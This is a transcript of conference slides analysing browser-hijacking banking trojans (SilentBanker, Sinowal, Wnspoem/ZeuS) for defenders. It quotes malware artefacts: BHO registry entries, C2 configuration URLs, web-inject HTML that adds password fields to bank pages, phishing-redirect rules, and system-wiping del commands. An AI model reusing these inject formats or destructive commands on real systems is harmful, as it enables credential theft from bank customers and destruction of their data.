common browser hijacking methods - terena
TRANSCRIPT
![Page 1: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/1.jpg)
*[ Common Browser Hijacking Methods]
David BarrosoTERENA Meeting, León
![Page 2: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/2.jpg)
2
Agenda
Examples: SilentBanker, Sinowal, Wnspoem
Browser Hijacking
Summary
Kill the Operating System
![Page 3: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/3.jpg)
Browser Hijacking
![Page 4: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/4.jpg)
Definition
“Browser hijacking is the modification of a web browser’s settings by malicious code. The term ‘hijacking’ is used as the changes are performed without the user’s permission” (Wikipedia)Additionally, the malicious code can modify the HTML rendered in the browser in order to lure the user
4
![Page 5: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/5.jpg)
Why are they asking for so many data?
5
![Page 6: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/6.jpg)
Examples
![Page 7: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/7.jpg)
7
SilentBanker
Date: 2007Method: Browser Helper ObjectTechnique: Real time HTML injection and HTML forwardingInfection: drive-by exploitsMisc: more than 75 mutations
![Page 8: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/8.jpg)
SilentBanker: Flow Diagram
8
![Page 9: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/9.jpg)
SilentBanker: BHO Installation
9
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}]@="Microsoft Shared Library Object Version"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\InprocServer32]@="C:\\WINDOWS\\system32\\mfc42dx1.dll""ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\ProgID]@="SharedObject.SharedObjectVersion.1"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\TypeLib]@="{5F226421-415D-408D-9A09-0DCD94E25B48}"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\VersionIndependentProgID]@="SharedObject.SharedObjectVersion"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
![Page 10: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/10.jpg)
SilentBanker: Configuration File
10
Get X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442
![Page 11: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/11.jpg)
SilentBanker: Configuration File
The encrypted configuration file includes:• Additional configuration sources• Dropsite URL• Update URL• Data encryption key
11
[dfgdf]Bg1=X.Y.67.30/~ipcount/ww6/getcfg.phpBg2=A.B.100.103/ww6/getcfg.php
[nbmx]Bg1=X.Y.67.30/~ipcount/ww6/data.phpBg2=A.B.100.103/ww6/data.php
[kjew]Bg1=X.Y.67.30/~ipcount/ww6/file.exeBg2=A.B.100.103/ww6/file.exe
[sdfs]secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585…
![Page 12: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/12.jpg)
SilentBanker: Injection Configuration
12
Get X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442
[jhw18]pok=insertqas=passport.yandex.ru/passportnjd=3ECFE0F0EEEBFC3A3C28dfr=9xzn=3C2367653E69xzq=5rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFEBE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206A767167752122292431222070796E666621227661636867223E0D0A202020203C766163686720676C63722122636E66666A6265712220616E7A722122636E66666…req=331
pok Actionqas Target URLnjd Begin replacement tokendfr Number of characters in njd -1xzn End replacement tokenxzq Number of characters in xzn -1rek HTML code injectedreq Number of characters in rek -1
insert insert injected HTML code between tokensdelete delete HTML code in xznreplace replace HTML code in xznsubreq substitute xzn with rekgrab extract field in xzn
pok Actionqas Target URLnjd Begin replacement tokendfr Number of characters in njd -1xzn End replacement tokenxzq Number of characters in xzn -1rek HTML code injectedreq Number of characters in rek -1
insert insert injected HTML code between tokensdelete delete HTML code in xznreplace replace HTML code in xznsubreq substitute xzn with rekgrab extract field in xzn
![Page 13: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/13.jpg)
SilentBanker: Injection Configuration
13
<ge inyvta!"gbc"><gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq><gq jvqgu!"%+1" pynff!"ynory">Ïëàòåæíûé ïàðîëü:<#gq><gq jvqgu!")$1" pynff!"vachg"><vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1"
gnovaqrk!"&">2aofc;2aofc;<oe#> <#gq><gq jvqgu!"&)1"><oe><#gq><#ge>
<tr valign="top"><td width="8%"><div style="width: 40px;"><br /></div></td><td width="17%" class="label">Ïëàòåæíûé ïàðîëü:</td><td width="50%" class="input"><input type="password" name="passwd2" value="" style="width:50%" tabindex="2
<br/> </td><td width="25%"><br></td></tr>
ROT-13 Algorithm
![Page 14: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/14.jpg)
SilentBanker: Original Webpage
14
![Page 15: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/15.jpg)
SilentBanker: Modified Webpage
15
![Page 16: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/16.jpg)
16
Sinowal/Anserin/Torpig
Date: 2005Method: Code InjectionTechnique: Real time HTML injection and HTML forwardingInfection: drive-by exploits and emailMisc: infects Master Boot Record (MBR) to be stealth
![Page 17: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/17.jpg)
Sinowal: Injection
Sinowal does not have a configuration file with details about all the injectionsEach time the user connects to a specific sites, Sinowal asks its injection server for instructions
17
![Page 18: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/18.jpg)
Sinowal: Injection Example
18
GET host/Key/EncryptedDataGET host/EFAAC5AEB85FF1D1/MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1
Tell me the fake page pathTell me the fake page path This is the targeted
brandThis is the targeted brand
I want the answer encryptedI want the answer encrypted
![Page 19: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/19.jpg)
Sinowal: Injection Example
Step 3: The injection server looks for the targeted brand:UK online*.lloydstsb.* /miheld.ibc {www} /uk/lloyds/lloyds.php
2 0 4 USA onlineid.bankofamerica.com /cgi-
bin/sso.login.controller* {www} /usa/bofa_pers/sso.login.php 2 0 3
ES www*.bancopopular.es /Bpemotor {www} /spain/bancopopular/bancopopular.php 2 0 2
19
![Page 20: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/20.jpg)
Sinowal: Injection Example
Step 4: the injection server answerswww*.bancopopular.es /Bpemotor /spain/bancopopular/bancopopular.php 2 0 5 1
20
This is the fake page pathThis is the fake page path
2: You need a GET2: You need a GET0: Number of visits to the real URL0: Number of visits to the real URL
5: number of injection attempts5: number of injection attempts
1: Injection enabled1: Injection enabled
![Page 21: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/21.jpg)
Sinowal: Targeted URLs
HTTP Forwarding (Web Injects)• UK: 40• DE: 47• US: 65• ES: 30• IT: 18• AT: 7• TR: 44
• PL: 7• AU: 26• SK: 5• NZ: 8• NL: 4• SG: 2
21
![Page 22: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/22.jpg)
22
Wnspoem/PRG/ZeuS/Ntos
Date: 2006Method: Code InjectionTechnique: Real time HTML injection and HTML forwardingInfection: drive-by exploits
Version 1 Version 2 Version 3 Version 4Directory wnspoem sysproc64 twain_32 lowsecFilename ntos.exe oembios.exe twext.exe sdra64.exeStolen data audio.dll sysproc86.sys local.ds local.dsConfiguration
video.dll sysproc32.sys user.ds user.ds
![Page 23: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/23.jpg)
Wnspoem: Famous Screenshots
23
![Page 24: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/24.jpg)
Wnspoem: Flow Diagram
24
![Page 25: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/25.jpg)
Wnspoem: Hooks
Wsock32.dll (FTP/POP3 capture)• Send• Sendto• Closesocket
Ws2_32.dll (FTP/POP3)• Send• Sendto• WSASend• WSASendTo• Closesocket
User32.dll (Keylogger)• GetMessage• PeekMesasge• GetClipboardData
Crypt32.dll (Certificates)• PFXImportCertStore
Wininet.dll (Capture data, inject HTML)
• HTTPSendRequest• InternetReadFile• InternetReadFileEx• InternetQueryDataAvailable• InternetCloseHandle• HTTPQueryInfo
Ntdll.dll (Infect processes and hide files)
• NtCreateThread• LdrLoadDll• LdrGetProcedureAddress• NtQueryDirectoryFile
25
![Page 26: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/26.jpg)
Wnspoem: Configuration File
set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GPdata_beforename="password"*</td>*</td>data_enddata_inject<td align="left" colspan="7" valign="bottom"></td></tr><tr><td class="textoHome" align="left">3. Clave de Transferencias</td><td width="20"><img src='/img4bog/px.gif' border='0' width="20" height="1"></td><td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3" class="TextoContenido"></td>data_enddata_afterdata_end
26
Configuration files in latest wnspoem version uses RC4 and 256-bits keys
![Page 27: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/27.jpg)
Wnspoem: Original Webpage
27
![Page 28: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/28.jpg)
Wnspoem: Modified Webpage
28
![Page 29: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/29.jpg)
Wnspoem: HTTP Forwarding
Some banks use security tokens or more complex 2nd authentication than a passwordIn this scenario, HTML injection is avoided, and the user is forwarded to a fake webpage usually hosted in a compromised site
29
![Page 30: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/30.jpg)
Wnspoem: HTTP Forwarding
In the configuration file:
@https://*.barclays.co.uk/* https://*.barclays.co.uk/* http://compromisedhost.com/img/commons/barclay/index.ph
p @https://*.cajasur.es/*https://*.cajasur.es/*http://compromisedhost.com/img/commons/cajasur/index.ph
p
30
![Page 31: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/31.jpg)
Wnspoem: Fake Webpage
31
![Page 32: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/32.jpg)
Wnspoem: Statistics
Analysis and Statistics: Configuration files750 configuration files (usually cfg.bin) analyzed.Only wnspoem version 1, 2 and 3
32
![Page 33: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/33.jpg)
Wnspoem: Top 10 TLD
33
![Page 34: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/34.jpg)
Wnspoem: Targeted Brands
34
![Page 35: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/35.jpg)
Wnspoem: Malicious Domains
35
![Page 36: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/36.jpg)
Wnspoem: Malicious IP Addresses
36
![Page 37: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/37.jpg)
Kill the Operating System
![Page 38: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/38.jpg)
Kill the Operating System
It is getting more common that just after stealing the credentials, the operating system is remotely destroyedThis action makes the analysis more difficult, since cannot be done remotely.The malicious code is not securely deleted in the system and can be recoveredOne optimistic result is that the machine will be reformated with a new and patched operating system.
38
![Page 39: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/39.jpg)
Kill the Operating System
Nethell:• Deletes NTDETECT.COM and ntldr
InfoStealer:• Deletes \drivers\*.sys• Deletes some registry keys (HKLM\Microsoft\Windows
NT\CurrentVersion\Winlogon: Shell = Explorer.exeWnspoem:• Deletes HKCU, HKLM\Software and HKLM\System
Glacial Dracon:• del /A:S /Q /F C:\\*.*• del /S /Q %SYSTEMROOT% %PROGRAMFILES%
39
![Page 40: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/40.jpg)
Summary
![Page 41: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/41.jpg)
Summary
Browser Hijacking is actively used in fraud schemesTargeted brands are all around the worldCurrently, only Microsoft Windows users are affected (Internet Explorer and Firefox)Be suspicious if your browser is asking for too much informationBe more suspicious if your computer stops working just after your browsing is asking for too much information ☺
41
![Page 43: Common Browser Hijacking Methods - TERENA](https://reader036.vdocuments.site/reader036/viewer/2022071600/613d27c9736caf36b759f8e2/html5/thumbnails/43.jpg)
*[ MUCHAS GRACIAS ]
Pág. 43